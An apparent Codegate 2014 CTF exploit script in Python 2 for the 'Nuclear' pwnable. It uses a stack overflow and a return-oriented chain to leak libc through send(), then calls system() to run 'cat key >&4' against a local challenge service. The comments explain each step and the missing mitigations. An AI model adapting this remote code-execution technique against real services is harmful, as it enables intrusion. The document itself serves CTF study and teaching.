Codegate 2014 Junior - Pwnable 300
-Remote Return Oriented Programming-
#!/usr/bin/python
#-*-coding:utf-8-*-
# Codegate 2014 Junior, Pwnable 300 ("Nuclear") -- write-up exploit script.
#
# Flow as written: (1) talk to the challenge service on 127.0.0.1:1129 and
# read a passcode out of its reply; (2) overflow a stack buffer and return
# into send@plt so the service writes its own GOT entry for send() back to
# us, which pins the libc load address at runtime; (3) overflow again,
# recv() a short command string into a fixed .data address and return into
# system() with that address as the argument. Python 2 only (print
# statements, str-based socket I/O).
#
# Every binary-side address below is hard-coded, so this only lines up with
# a non-PIE build of the target, and offset_send_system ties the script to a
# single libc build (Ubuntu 15.04 per the author's note). From the defender's
# side: the technique depends on the absence of a stack canary and of PIE,
# and on the target accepting unbounded input at the two overflow points.
import socket
import struct
import time

#Endian Translator
# 32-bit little-endian pack/unpack. Note up() returns a 1-tuple, so callers
# index [0] (see send_addr below).
p = lambda x : struct.pack("<L", x)
up = lambda x : struct.unpack("<L", x)

#PLT_GOT Addresses
# Fixed addresses inside the (non-PIE) target binary.
send_plt = 0x08048900
send_got = 0x804b07c
recv_plt = 0x080488e0
recv_got = 0x0804b074   # not referenced anywhere below

#Libc Addresses
recv_addr = None        # never assigned or read below; presumably left over from an earlier draft
system_addr = None      # filled in after the leak

#Gadget/F_Stack Addresses
start_routine = 0x08048b5b  # where execution resumes after the leak frame; name suggests the service's handler entry -- confirm in the binary
ppppr = 0x0804917c          # presumably a pop;pop;pop;pop;ret gadget: it consumes the four call arguments placed after it
data_addr = 0x0804b088      # writable .data slot that the second stage recv()s the command string into

#Misc
offset_send_system = 0xfb0 #Ubuntu 15.04 Vivid
# Distance from send() to system() inside the target's libc; any other libc
# build needs its own value, which is why the author pinned the distro.
passcode = None

print '''
[!] Codegate 2014 Nuclear Exploit [!]
~ By RevDev
~ Python 2.7
~ Local Exploit
'''

print "[!] Establishing Connection [!]"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 1129))    # local instance of the challenge service
print s
print ''

print "[!] Getting Passcode [!]"
# Protocol walk: each recv() drains the current prompt before the next
# answer is sent. recv(1024) assumes a prompt arrives in a single read,
# which is unchecked and only plausible over loopback.
s.recv(1024)
s.send("target\n")
s.recv(1024)
s.send("1.1/1.1\n")
s.recv(1024)
s.send("A"*512+"\n")       # over-long input after which the service's reply contains the passcode; why it does is not visible here -- check the binary
s.recv(1024)
passcode = s.recv(1024)
# Keep everything after the second '?' and then only its first line; raises
# ValueError if the reply holds fewer than two '?' characters.
passcode = passcode[passcode.index('?', passcode.index('?')+1)+1:]
passcode = passcode.split("\n")[0]
print "Passcode : %s\n" %passcode

print "[!] Leaking Libc Function Address [!]"
s.send("launch\n")
s.recv(1024)
time.sleep(0.3)           # fixed delays stand in for reading up to a delimiter; fragile under load
s.send(passcode+"\n")
time.sleep(0.3)
s.recv(1024)
# Stage 1: 528 filler bytes, then a frame that calls
#   send(4, send_got, 4, 0)
# so the service writes the 4-byte GOT entry of send() to fd 4 (presumably
# the client socket). ppppr then discards those four arguments and control
# moves to start_routine, called with "\x90"*4 as its return address and 4
# as its first argument, so the service keeps serving for stage 2. Whether
# 528 lands exactly on the saved return address is not visible here.
payload = "A"*528 + p(send_plt) + p(ppppr) + p(4) + p(send_got) + p(4) + p(0) + p(start_routine) + "\x90"*4 + p(4)
s.send(payload + "\n")
send_addr = up(s.recv(1024))   # struct.error unless exactly 4 bytes arrive
system_addr = int(send_addr[0]) + offset_send_system
print "_Send Address : 0x%x" %send_addr     # send_addr is a 1-tuple; %-formatting unpacks it
print "_System Address : 0x%x\n" %system_addr

print "[!] Sending Exploit [!]"
# Stage 2: same layout. recv(4, data_addr, 13, 0) reads the command sent
# below into .data, then system(data_addr) runs it with "\x90"*4 as the
# return address. The 13 must equal len("cat key >&4\n"+"\x00") (12 + 1);
# a mismatch truncates the string or drops its NUL terminator.
payload = "A"*528 + p(recv_plt) + p(ppppr) + p(4) + p(data_addr) + p(13) + p(0) + p(system_addr) + "\x90"*4 + p (data_addr)
s.send(payload + "\n")
s.recv(1024)
s.send("cat key >&4\n"+"\x00")   # ">&4" sends the command's output to fd 4, the same descriptor used for the leak, so the flag comes back over this connection
s.recv(1024)
print "Flag : %s" %s.recv(1024)
s.close()